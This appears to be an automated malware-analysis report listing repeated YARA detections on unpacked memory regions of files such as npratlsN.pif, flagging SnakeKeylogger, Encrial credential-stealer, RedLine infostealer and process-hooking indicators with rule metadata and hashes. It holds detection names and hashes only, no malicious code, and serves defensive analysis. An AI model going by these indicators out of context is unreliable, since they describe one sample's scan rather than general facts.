Source: 16.2.npratlsN.pif.2e310ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.npratlsN.pif.2b48a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.npratlsN.pif.2dd40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.npratlsN.pif.2b48a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.npratlsN.pif.2dd40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.npratlsN.pif.2dd40ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.npratlsN.pif.2dd40ee8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.npratlsN.pif.2dd40ee8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.npratlsN.pif.2e310000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.npratlsN.pif.2e310000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.npratlsN.pif.2b489a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.npratlsN.pif.242f0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.npratlsN.pif.242f0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.npratlsN.pif.242f0000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.npratlsN.pif.2ea90000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.npratlsN.pif.2ea90000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.brightness.exe.21890948.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.3.npratlsN.pif.29aec7e8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.3.npratlsN.pif.29aec7e8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.3.npratlsN.pif.29aec7e8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.npratlsN.pif.2dd40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.npratlsN.pif.23cc0ee8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.npratlsN.pif.2dd40000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.npratlsN.pif.2dd40000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.npratlsN.pif.2bb89a06.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.npratlsN.pif.2bb89a06.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.npratlsN.pif.2bb89a06.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.npratlsN.pif.2dd40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.npratlsN.pif.2dd40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.npratlsN.pif.2dd40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.npratlsN.pif.2e310ee8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.npratlsN.pif.2e310ee8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.npratlsN.pif.2bb89a06.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.npratlsN.pif.2bb89a06.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.npratlsN.pif.2bb89a06.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.npratlsN.pif.2e490000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.npratlsN.pif.214f9a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.npratlsN.pif.214f9a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.npratlsN.pif.2b48a8ee.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.npratlsN.pif.214f9a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.npratlsN.pif.2b48a8ee.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.npratlsN.pif.2b48a8ee.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.npratlsN.pif.214f9a06.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.npratlsN.pif.214f9a06.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.npratlsN.pif.2e310ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.npratlsN.pif.2e310ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.npratlsN.pif.2dd40000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.npratlsN.pif.2e310ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.npratlsN.pif.2e310000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.npratlsN.pif.23cc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.npratlsN.pif.23cc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.npratlsN.pif.23cc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.npratlsN.pif.2b489a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.Nsltarpn.PIF.20fe67a8.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.npratlsN.pif.242f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.npratlsN.pif.242f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.npratlsN.pif.2b489a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.npratlsN.pif.2ea90000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.npratlsN.pif.2e490000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.npratlsN.pif.23cc0ee8.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.npratlsN.pif.242f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.npratlsN.pif.23cc0ee8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.npratlsN.pif.214f9a06.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.npratlsN.pif.214fa8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.npratlsN.pif.214fa8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.npratlsN.pif.214fa8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.npratlsN.pif.2e490000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.npratlsN.pif.2bb8a8ee.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.npratlsN.pif.2bb8a8ee.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
